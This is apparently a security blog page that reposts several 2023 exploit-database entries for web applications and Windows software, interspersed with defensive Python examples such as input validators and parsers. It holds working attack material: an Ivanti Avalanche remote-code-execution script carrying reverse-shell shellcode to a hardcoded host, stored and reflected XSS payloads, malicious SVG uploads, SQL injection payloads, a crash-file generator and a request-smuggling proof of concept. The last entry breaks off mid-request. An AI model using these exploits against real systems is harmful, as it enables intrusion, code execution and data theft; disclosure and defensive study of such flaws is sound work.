Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title: Hyip Rio 2.1 - Arbitrary File Upload
# Exploit Author: CraCkEr
# Date: 30/07/2023
# Vendor: tdevs
# Vendor Homepage: https://tdevs.co/
# Software Link: https://hyiprio-feature.tdevs.co/
# Version: 2.1
# Tested on: Windows 10 Pro
# Impact: Allows User to upload files to the web server
# CVE: CVE-2023-4382


## Description

Allows an attacker to upload malicious files onto the server, such as an SVG carrying stored XSS


## Steps to Reproduce:

1. Login as a [Normal User]
2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/user/settings
3. Upload any Image into the [avatar]
4. Capture the POST Request with [Burp Proxy Intercept]
5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]

-----------------------------------------------------------
POST /user/settings/profile-update HTTP/2

Content-Disposition: form-data; name="avatar"; filename="XSS.svg"
Content-Type: image/png

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS by Skalvin");
</script>
</svg>
-----------------------------------------------------------

6. Send the Request
7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS] or right-click on the Avatar and Copy the Link
8. Access your Uploaded Evil file on this Path: https://website/assets/global/images/********************.svg



[-] Done
            
"""
Exploit Title: Ivanti Avalanche <v6.4.0.0 - Remote Code Execution
Date: 2023-08-16
Exploit Author: Robel Campbell (@RobelCampbell)
Vendor Homepage: https://www.ivanti.com/
Software Link: https://www.wavelink.com/download/Downloads.aspx?DownloadFile=27550&returnUrl=/Download-Avalanche_Mobile-Device-Management-Software/
Version: v6.4.0.0
Tested on: Windows 11 21H2
CVE: CVE-2023-32560
Reference: https://www.tenable.com/security/research/tra-2023-27
"""

import socket
import struct
import sys

# Create an item structure for the header and payload
class Item:
    def __init__(self, type_, name, value):
        self.type = type_
        self.name = name.encode()
        self.value = value
        self.name_size = 0x5
        self.value_size = 0x800

    def pack(self):
        return struct.pack('>III{}s{}s'.format(self.name_size, self.value_size),
                           self.type, self.name_size, self.value_size, self.name, self.value)

# Create a header structure
class HP:
    def __init__(self, hdr, payload):
        self.hdr = hdr
        self.payload = payload
        self.pad = b'\x00' * (16 - (len(self.hdr) + len(self.payload)) % 16)

    def pack(self):
        return b''.join([item.pack() for item in self.hdr]) + \
               b''.join([item.pack() for item in self.payload]) + self.pad

# Create a preamble structure
class Preamble:
    def __init__(self, hp):
        self.msg_size = len(hp.pack()) + 16
        self.hdr_size = sum([len(item.pack()) for item in hp.hdr])
        self.payload_size = sum([len(item.pack()) for item in hp.payload])
        self.unk = 0  # Unknown value

    def pack(self):
        return struct.pack('>IIII', self.msg_size, self.hdr_size, self.payload_size, self.unk)

# Create a message structure
class Msg:
    def __init__(self, hp):
        self.pre = Preamble(hp)
        self.hdrpay = hp

    def pack(self):
        return self.pre.pack() + self.hdrpay.pack()

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.86.30 LPORT=4444 exitfunc=thread -f python
shellcode =  b""
shellcode += b"fce8820000006089e531c064"
shellcode += b"8b50308b520c8b52148b7228"
shellcode += b"0fb74a2631ffac3c617c022c"
shellcode += b"20c1cf0d01c7e2f252578b52"
shellcode += b"108b4a3c8b4c1178e34801d1"
shellcode += b"518b592001d38b4918e33a49"
shellcode += b"8b348b01d631ffacc1cf0d01"
shellcode += b"c738e075f6037df83b7d2475"
shellcode += b"e4588b582401d3668b0c4b8b"
shellcode += b"581c01d38b048b01d0894424"
shellcode += b"245b5b61595a51ffe05f5f5a"
shellcode += b"8b12eb8d5d68333200006877"
shellcode += b"73325f54684c772607ffd5b8"
shellcode += b"9001000029c454506829806b"
shellcode += b"00ffd5505050504050405068"
shellcode += b"ea0fdfe0ffd5976a0568c0a8"
shellcode += b"561e680200115c89e66a1056"
shellcode += b"576899a57461ffd585c0740c"
shellcode += b"ff4e0875ec68f0b5a256ffd5"
shellcode += b"68636d640089e357575731f6"
shellcode += b"6a125956e2fd66c744243c01"
shellcode += b"018d442410c6004454505656"
shellcode += b"5646564e565653566879cc3f"
shellcode += b"86ffd589e04e5646ff306808"
shellcode += b"871d60ffd5bbe01d2a0a68a6"
shellcode += b"95bd9dffd53c067c0a80fbe0"
shellcode += b"7505bb4713726f6a0053ffd5"

buf = b'90' * 340
buf += b'812b4100' # jmp esp (0x00412b81)
buf += b'90909090'
buf += b'90909090'
buf += shellcode
buf += b'41' * 80
buf += b'84d45200' # stack pivot: add esp, 0x00000FA0 ; retn 0x0004 ; (0x0052d484)
buf += b'43' * (0x800 - len(buf))

buf2 = b'41' * 0x1000

# Create message payload
hdr = [Item(3, "pwned", buf)]
payload = [Item(3, "pwned", buf2)] # dummy payload, probably not necessary
hp_instance = HP(hdr, payload)
msg_instance = Msg(hp_instance)

# Default port
port = 1777

# check for target host argument
if len(sys.argv) > 1:
    host = sys.argv[1]
else:
    print("Usage: python3 CVE-2023-32560.py <host ip>")
    sys.exit()

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((host, port))
    s.sendall(msg_instance.pack())
    print("Message sent!")
    s.close()
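As an added defender-side example (not part of the advisory and not Ivanti's code), the parser below reads the preamble/item layout that the PoC above builds with `struct` and rejects messages whose declared sizes are inconsistent with the bytes received or exceed a policy cap; `MAX_NAME` and `MAX_VALUE` are assumed sensor policy values, not limits taken from the product, and the sample messages are constructed here.

```python
import struct

# Layout used by the PoC: a 16-byte preamble of four big-endian uint32s,
# followed by header items, payload items and zero padding to 16 bytes.
PREAMBLE_FMT = ">IIII"      # msg_size, hdr_size, payload_size, unk
ITEM_HDR_FMT = ">III"       # type, name_size, value_size (then name, value)
PREAMBLE_LEN = struct.calcsize(PREAMBLE_FMT)
ITEM_HDR_LEN = struct.calcsize(ITEM_HDR_FMT)

# Assumed policy caps for a sensor or a hardened receiver (hypothetical values).
MAX_NAME = 64
MAX_VALUE = 0x400
MAX_MESSAGE = 0x10000


class MalformedMessage(ValueError):
    """Raised when declared sizes disagree with the bytes actually present."""


def build_item(type_, name, value):
    """Pack one item with real sizes (the PoC instead hard-codes 0x800)."""
    name = name.encode()
    return struct.pack(ITEM_HDR_FMT, type_, len(name), len(value)) + name + value


def build_message(hdr_items, payload_items, unk=0):
    """Assemble preamble + items with the same padding rule as the PoC."""
    hdr = b"".join(hdr_items)
    payload = b"".join(payload_items)
    body = hdr + payload
    body += b"\x00" * (16 - len(body) % 16)
    return struct.pack(PREAMBLE_FMT, len(body) + PREAMBLE_LEN,
                       len(hdr), len(payload), unk) + body


def parse_items(blob):
    """Walk a header or payload section, enforcing per-item bounds."""
    items = []
    off = 0
    while off + ITEM_HDR_LEN <= len(blob):
        type_, nsz, vsz = struct.unpack_from(ITEM_HDR_FMT, blob, off)
        off += ITEM_HDR_LEN
        if nsz > MAX_NAME or vsz > MAX_VALUE:
            raise MalformedMessage(f"item sizes out of policy: name={nsz} value={vsz}")
        if off + nsz + vsz > len(blob):
            raise MalformedMessage("item length exceeds enclosing section")
        items.append((type_, blob[off:off + nsz], blob[off + nsz:off + nsz + vsz]))
        off += nsz + vsz
    return items


def parse_message(data):
    """Validate the preamble against the received length, then parse sections."""
    if len(data) < PREAMBLE_LEN:
        raise MalformedMessage("short preamble")
    msg_size, hdr_size, payload_size, unk = struct.unpack_from(PREAMBLE_FMT, data, 0)
    if msg_size > MAX_MESSAGE:
        raise MalformedMessage(f"declared size {msg_size} exceeds cap")
    if msg_size != len(data):
        raise MalformedMessage(f"declared {msg_size} bytes, received {len(data)}")
    if PREAMBLE_LEN + hdr_size + payload_size > msg_size:
        raise MalformedMessage("section sizes exceed message size")
    hdr_start = PREAMBLE_LEN
    pay_start = hdr_start + hdr_size
    return {
        "unk": unk,
        "hdr": parse_items(data[hdr_start:pay_start]),
        "payload": parse_items(data[pay_start:pay_start + payload_size]),
    }


def check_message(data):
    """Return (ok, detail); convenient for a sensor rule or a unit test."""
    try:
        parsed = parse_message(data)
    except MalformedMessage as exc:
        return False, str(exc)
    return True, f"{len(parsed['hdr'])} header item(s), {len(parsed['payload'])} payload item(s)"
```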
            
# Exploit Title: Credit Lite 1.5.4 - SQL Injection
# Exploit Author: CraCkEr
# Date: 31/07/2023
# Vendor: Hobby-Tech
# Vendor Homepage: https://codecanyon.net/item/credit-lite-micro-credit-solutions/39554392
# Software Link: https://credit-lite.appshat.xyz/
# Version: 1.5.4
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4407
# CWE: CWE-89 - CWE-74 - CWE-707

## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.



## Steps to Reproduce:

To Catch the POST Request

1. Visit [Account Statement] on this Path: https://website/portal/reports/account_statement

2. Select [Start Date] + [End Date] + [Account Number] and Click on [Filter]



Path: /portal/reports/account_statement

POST parameter 'date1' is vulnerable to SQL Injection
POST parameter 'date2' is vulnerable to SQL Injection

-------------------------------------------------------------------------
POST /portal/reports/account_statement HTTP/2

_token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=[SQLi]&date2=[SQLi]&account_number=20005001
-------------------------------------------------------------------------

---
Parameter: date1 (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&date2=2023-07-31&account_number=20005001

Parameter: date2 (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31&date2=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z&account_number=20005001
---



[-] Done
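Added example, not the product's code: the account-statement filter written with string concatenation (the pattern the advisory's findings imply) next to a version that validates `date1`/`date2` as ISO dates and binds parameters. It uses an in-memory SQLite table constructed here, so a tautology payload stands in for the MySQL `SLEEP` payload shown above.

```python
import datetime
import sqlite3


def demo_db():
    """Constructed sample data shaped like an account-statement table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE transactions (account_number TEXT, tx_date TEXT, amount REAL)")
    con.executemany("INSERT INTO transactions VALUES (?, ?, ?)", [
        ("20005001", "2023-07-30", 100.0),
        ("20005001", "2023-07-31", -25.5),
        ("20005002", "2023-07-31", 10.0),
    ])
    return con


def account_statement_vulnerable(con, date1, date2, account_number):
    """Request parameters spliced into SQL text: the injectable pattern."""
    sql = ("SELECT tx_date, amount FROM transactions "
           f"WHERE account_number = '{account_number}' "
           f"AND tx_date BETWEEN '{date1}' AND '{date2}' ORDER BY tx_date")
    return con.execute(sql).fetchall()


def validate_statement_params(date1, date2, account_number):
    """Strict typing of the three filter fields; raises ValueError on anything else."""
    try:
        d1 = datetime.date.fromisoformat(date1)
        d2 = datetime.date.fromisoformat(date2)
    except (TypeError, ValueError):
        raise ValueError("dates must be YYYY-MM-DD")
    if d1 > d2:
        raise ValueError("start date after end date")
    if not (account_number.isdigit() and len(account_number) <= 20):
        raise ValueError("account number must be numeric")
    return d1, d2, account_number


def request_is_acceptable(date1, date2, account_number):
    """True when the parameters would be allowed to reach the query."""
    try:
        validate_statement_params(date1, date2, account_number)
        return True
    except ValueError:
        return False


def account_statement_safe(con, date1, date2, account_number):
    """Validated values bound as parameters; the SQL text never changes."""
    d1, d2, acct = validate_statement_params(date1, date2, account_number)
    sql = ("SELECT tx_date, amount FROM transactions WHERE account_number = ? "
           "AND tx_date BETWEEN ? AND ? ORDER BY tx_date")
    return con.execute(sql, (acct, d1.isoformat(), d2.isoformat())).fetchall()
```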
            
# Exploit Title: NVClient v5.0 - Stack Buffer Overflow (DoS)
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 2023-08-19
# Software Link: http://www.neonguvenlik.com/yuklemeler/yazilim/kst-f919-hd2004.rar
# Software Manual: http://download.eyemaxdvr.com/DVST%20ST%20SERIES/CMS/Video%20Surveillance%20Management%20Software(V5.0).pdf
# Vulnerability Type: Buffer Overflow Local
# Tested On: Windows 10 64bit
# Tested Version: 5.0


# Steps to Reproduce:
# 1- Run the python script and create exploit.txt file
# 2- Open the application and log in
# 3- Click the "Config" button in the upper menu
# 4- Click the "User" button just below it
# 5- Now click the "Add users" button in the lower left
# 6- Fill in the Username, Password, and Confirm boxes
# 7- Paste the characters from exploit.txt into the Contact box
# 8- Click OK and crash!

#!/usr/bin/env python3

exploit = 'A' * 846

try:
    with open("exploit.txt", "w") as file:
        file.write(exploit)
    print("POC is created")
except OSError as err:
    print("POC not created:", err)
            
HireHackking

CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')

# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')
# Date: 2023/08/18
# CVE: CVE-2023-38911
# Exploit Author: Daniel González
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://github.com/cskaza/cszcms
# Version: 1.3.0
# Tested on: CSZ CMS 1.3.0

# Description:
# CSZ CMS 1.3.0 is affected by a stored cross-site scripting (XSS) vulnerability that allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'YouTube URL' field of a previously created gallery in the 'Gallery' section.
# Note that in earlier versions the "Name" field used when creating a gallery was vulnerable to XSS; that was resolved in the current version 1.3.0. The vulnerability found here affects the "YouTube URL" field within the created gallery.

# Steps to reproduce Stored XSS:
# Go to the URL http://localhost/admin/plugin/gallery/edit/2.
# After logging into the panel, go to the "Gallery" section and create a Carousel [http://localhost/admin/plugin/gallery]. The vulnerable field is located at [http://localhost/admin/plugin/gallery/edit/2].
# Edit the gallery just created; arbitrary web scripts or HTML can be injected into the "Youtube URL" field.

# With the following payload we can achieve the XSS

Payload: <div><p title="</div><svg/onload=alert(document.domain)>">

# PoC Request:

POST http://localhost:8080/admin/plugin/gallery/addYoutube/2 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
Origin: http://localhost:8080
Referer: http://localhost:8080/admin/plugin/gallery/edit/2
Upgrade-Insecure-Requests: 1

gallery_type=youtubevideos&youtube_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add
HireHackking

Academy LMS 6.1 - Arbitrary File Upload

# Exploit Title: Academy LMS 6.1 - Arbitrary File Upload
# Exploit Author: CraCkEr
# Date: 05/08/2023
# Vendor: Creativeitem
# Vendor Homepage: https://academylms.net/
# Software Link: https://demo.academylms.net/
# Version: 6.1
# Tested on: Windows 10 Pro
# Impact: Allows User to upload files to the web server
# CWE: CWE-79 - CWE-74 - CWE-707

## Description

Allows an attacker to upload malicious files onto the server, such as an SVG carrying stored XSS

## Steps to Reproduce:

1. Login as a [Normal User]
2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/dashboard/#/settings
3. Upload any Image into the [avatar]
4. Capture the POST Request with [Burp Proxy Intercept]
5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]

-----------------------------------------------------------
POST /wp-admin/async-upload.php HTTP/2
-----------------------------------------------------------
Content-Disposition: form-data; name="async-upload"; filename="ahacka.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS by CraCkEr");
</script>
</svg>
-----------------------------------------------------------

6. Send the Request
7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS]
8. Access your Uploaded Evil file on this Path: https://website/wp-content/uploads/***/**/*****.svg

[-] Done
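Server-side check that rejects the avatar upload described in this advisory and in the Hyip Rio advisory above (an SVG with `<script>` submitted under an image filename or Content-Type); added example, not code from either product. The magic-byte allow-list and the sample uploads are constructed here.

```python
# Leading bytes of the raster formats an avatar field should accept.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
ALLOWED_EXT = {"png": "image/png", "jpg": "image/jpeg", "jpeg": "image/jpeg", "gif": "image/gif"}

# Constructed samples: the advisories' SVG-with-script body, and a PNG header.
SAMPLE_SVG_XSS = (b'<?xml version="1.0" standalone="no"?>\n'
                  b'<svg xmlns="http://www.w3.org/2000/svg">'
                  b'<script>alert(1)</script></svg>')
SAMPLE_PNG = PNG_MAGIC + b"\x00" * 32


def sniff_image_type(data):
    """MIME type implied by the file signature, or None if unknown."""
    if data.startswith(PNG_MAGIC):
        return "image/png"
    if data.startswith(b"\xff\xd8\xff"):
        return "image/jpeg"
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return "image/gif"
    return None


def looks_like_markup(data):
    """SVG/XML/HTML bodies begin with '<' after an optional BOM and whitespace."""
    head = data.lstrip(b"\xef\xbb\xbf \t\r\n")[:32]
    return head.startswith(b"<")


def validate_avatar_upload(filename, declared_type, data):
    """Return (accepted, reason). Extension, sniffed type and declared type
    must all agree, and markup is refused outright, so renaming the file or
    changing the Content-Type header (steps 5 above) does not help."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        return False, f"extension '{ext}' not in allow-list"
    if looks_like_markup(data):
        return False, "body is markup (SVG/XML/HTML), not a raster image"
    sniffed = sniff_image_type(data)
    if sniffed is None:
        return False, "unrecognised image signature"
    if sniffed != ALLOWED_EXT[ext]:
        return False, f"extension .{ext} does not match sniffed {sniffed}"
    if declared_type != sniffed:
        return False, f"declared {declared_type} does not match sniffed {sniffed}"
    return True, "ok"
```

Serving stored uploads with `X-Content-Type-Options: nosniff` and from a separate origin removes the remaining script-execution risk even if a check like this is bypassed.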
HireHackking

AdminLTE PiHole 5.18 - Broken Access Control

# Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control
# Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit_googlehack.216554)
# Date: 21.12.2022
# Exploit Author: kv1to
# Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17
# Tested on: Raspbian / Debian
# Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497
# CVE : CVE-2022-23513

In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on the queryads endpoint.

## Proof Of Concept with curl:

curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>'

## HTTP request

GET /admin/scripts/pi-hole/php/queryads.php?domain=<searchquery> HTTP/1.1
HOST: pi.hole
Cookie: [..SNIPPED..]
[..SNIPPED..]

## HTTP Response

HTTP/1.1 200 OK
[..SNIPPED..]

data: Match found in [..SNIPPED..]
data: <domain>
data: <domain>
data: <domain>
HireHackking

Kingo ROOT 1.5.8 - Unquoted Service Path

#Exploit Title: Kingo ROOT 1.5.8 - Unquoted Service Path
#Date: 8/22/2023
#Exploit Author: Anish Feroz (ZEROXINN)
#Vendor Homepage: https://www.kingoapp.com/
#Software Link: https://www.kingoapp.com/android-root/download.htm
#Version: 1.5.8.3353
#Tested on: Windows 10 Pro

-------------Discovering Unquoted Path--------------

C:\Users\Anish>sc qc KingoSoftService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: KingoSoftService
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\Usman\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\KingoSoftService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : KingoSoftService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\Anish>systeminfo

Host Name:                 DESKTOP-UT7E7CF
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19045 N/A Build 19045
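Added example, not the advisory's own tooling: parse the `sc qc` output shown above, flag an image path that is unquoted and contains a space, and produce the quoted form that remediation sets with `sc config <service> binPath=`. The sample output is constructed here from the advisory's listing.

```python
import re

# Constructed sample in the layout `sc qc <service>` prints, using the
# BINARY_PATH_NAME from the advisory (spaces, no quotes).
SAMPLE_SC_QC = """SERVICE_NAME: KingoSoftService
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\\Users\\Usman\\AppData\\Local\\Kingosoft\\Kingo Root\\update_27205\\bin\\KingoSoftService.exe
        SERVICE_START_NAME : LocalSystem
"""


def binary_path_from_sc_qc(text):
    """Extract the BINARY_PATH_NAME value from `sc qc` output, or None."""
    m = re.search(r"^\s*BINARY_PATH_NAME\s*:\s*(.*)$", text, re.M)
    return m.group(1).strip() if m else None


def _image_end(path):
    """Index just past the executable name (first '.exe', case-insensitive)."""
    idx = path.lower().find(".exe")
    return len(path) if idx < 0 else idx + 4


def is_unquoted_service_path(path):
    """True when the path is not quoted and has a space before the executable
    name, the condition the Service Control Manager resolves ambiguously."""
    if not path or path.startswith('"'):
        return False
    return " " in path[:_image_end(path)]


def quoted_fix(path):
    """Remediated value: the image path wrapped in quotes, arguments untouched."""
    end = _image_end(path)
    return f'"{path[:end]}"{path[end:]}'
```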
HireHackking

Member Login Script 3.3 - Client-side desync

## Title: Member Login Script 3.3 - Client-side desync
## Author: nu11secur1ty
## Date: 08/25/2023
## Vendor: https://www.phpjabbers.com/
## Reference: https://portswigger.net/web-security/request-smuggling/browser/client-side-desync

## Description:
The server appears to be vulnerable to client-side desync attacks. A POST request was sent to the path '/1692959852_473/index.php' with a second request sent as the body. The server ignored the Content-Length header and did not close the connection, leading to the smuggled request being interpreted as the next request.

STATUS: HIGH Vulnerability

[+]Exploit:

```
POST /1692959852_473/index.php?controller=pjFront&action=pjActionLoadCss HTTP/1.1
Host: demo.phpjabbers.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Connection: keep-alive
Cache-Control: max-age=0
Cookie: _ga=GA1.2.2069938240.1692907228; _gid=GA1.2.1275975650.1692907228; _gat=1; _fbp=fb.1.1692907228280.366290059; _ga_NME5VTTGTT=GS1.2.1692957291.2.1.1692957719.60.0.0; YellowPages=slk3eokcgmdf0r3t7c020quv35; pjd=g0i8fch5jkebraaaf2812afvb5; pjd_1692957219_259=1
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 1190
Content-Type: application/x-www-form-urlencoded

GET /robots.txt HTTP/1.1
Host: demo.phpjabbers.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Connection: keep-alive
Cache-Control: max-age=0

GET /robots.txt HTTP/2
Host: www.pornhub.com
Cookie: platform=pc; ss=405039333413129808; fg_0d2ec4cbd943df07ec161982a603817e=60256.100000; fg_9951ce1ac4434b4ac312a1334fa77d82=6902.100000
Cache-Control: max-age=0
Sec-Ch-Ua:
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Full-Version: ""
Sec-Ch-Ua-Arch: ""
Sec-Ch-Ua-Platform: ""
Sec-Ch-Ua-Platform-Version: ""
Sec-Ch-Ua-Model: ""
Sec-Ch-Ua-Full-Version-List:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Member-Login-Script-3.3)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/member-login-script-33-client-side.html)

## Time spent: 00:35:00
HireHackking

SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS

# Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 20/08/2023
# Vendor: SPA-Cart
# Vendor Homepage: https://spa-cart.com/
# Software Link: https://demo.spa-cart.com/
# Version: 1.9.0.3
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-4547
# CWE: CWE-79 - CWE-74 - CWE-707

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

An attacker who sends the victim a link containing a malicious URL, in an email or instant message, can perform a wide variety of actions, such as stealing the victim's session token or login credentials.

Path: /search

GET parameter 'filter[brandid]' is vulnerable to XSS
GET parameter 'filter[price]' is vulnerable to XSS

https://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[XSS]&filter[price]=[XSS]&filter[attr][Memory][]=500%20GB

XSS Payloads:

vnxjb"><script>alert(1)</script>bvu51

[-] Done
HireHackking

Bus Reservation System 1.1 - Multiple-SQLi

## Title: Bus Reservation System-1.1 Multiple-SQLi
## Author: nu11secur1ty
## Date: 08/26/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://demo.phpjabbers.com/1693027053_628/preview.php?lid=1
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `pickup_id` parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the pickup_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The attacker can steal information from the whole database!

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:

```mysql
---
Parameter: pickup_id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=(SELECT (CASE WHEN (3959=3959) THEN 0x3927 ELSE (SELECT 8499 UNION SELECT 2098) END))&session_id=

    Type: error-based
    Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)
    Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=GTID_SUBSET(CONCAT(0x71626b7a71,(SELECT (ELT(5210=5210,1))),0x716a6b7171),5210)&session_id=

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=(SELECT 2616 FROM (SELECT(SLEEP(15)))clIR)&session_id=
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Bus-Reservation-System-1.1-Multiple-SQLi)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/bus-reservation-system-11-multiple-sqli.html)

## Time spent: 00:25:00
HireHackking
## Title: Jorani v1.0.3-(c)2014-2023 - XSS Reflected & Information Disclosure
## Author: nu11secur1ty
## Date: 08/27/2023
## Vendor: https://jorani.org/
## Software: https://demo.jorani.org/session/login
## Reference: https://portswigger.net/web-security/cross-site-scripting
## Reference: https://portswigger.net/web-security/information-disclosure

## Description:
The value of the `language` request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75943";alert(1)//569 was submitted in the language parameter. This input was echoed unmodified in the application's response. The attacker can modify the session token and can discover sensitive information about the server.

STATUS: HIGH-Vulnerability

[+]Exploit:

```POST
POST /session/login HTTP/1.1
Host: demo.jorani.org
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2; jorani_session=fbc630d2510ffdd2a981ccfe97301b1b90ab47dc#ATTACK
Origin: http://demo.jorani.org
